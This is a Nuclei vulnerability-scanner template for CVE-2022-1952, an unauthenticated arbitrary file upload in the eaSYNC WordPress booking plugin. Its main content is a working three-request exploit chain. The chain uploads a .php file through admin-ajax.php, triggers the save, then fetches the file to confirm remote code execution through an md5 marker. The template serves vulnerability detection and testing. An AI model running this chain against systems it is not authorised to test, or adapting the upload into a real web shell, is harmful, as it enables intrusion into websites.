nuclei-templates/cves/2022/CVE-2022-1952.yaml

76 lines
2.6 KiB
YAML

id: CVE-2022-1952
info:
name: eaSYNC < 1.1.16 - Unauthenticated Arbitrary File Upload
author: theamanrawat
severity: critical
description: |
The Free Booking Plugin for Hotels, Restaurant and Car Rental WordPress plugin before 1.1.16 suffers from insufficient input validation which leads to arbitrary file upload and subsequently to remote code execution. An AJAX action accessible to unauthenticated users is affected by this issue. An allowlist of valid file extensions is defined but is not used during the validation steps.
reference:
- https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04
- https://wordpress.org/plugins/easync-booking/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1952
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-1952
cwe-id: CWE-434
metadata:
verified: true
tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059
--------------------------98efee55508c5059
Content-Disposition: form-data; name="action"
easync_session_store
--------------------------98efee55508c5059
Content-Disposition: form-data; name="type"
car
--------------------------98efee55508c5059
Content-Disposition: form-data; name="with_driver"
self-driven
--------------------------98efee55508c5059
Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
<?php echo md5('CVE-2022-1952');?>
--------------------------98efee55508c5059--
- |
GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
- |
GET /wp-content/uploads/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- contains(all_headers_3, "text/html")
- status_code_3 == 200
- contains(body_1, 'success\":true')
- contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')
condition: and
extractors:
- type: regex
name: filename
group: 1
regex:
- 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
internal: true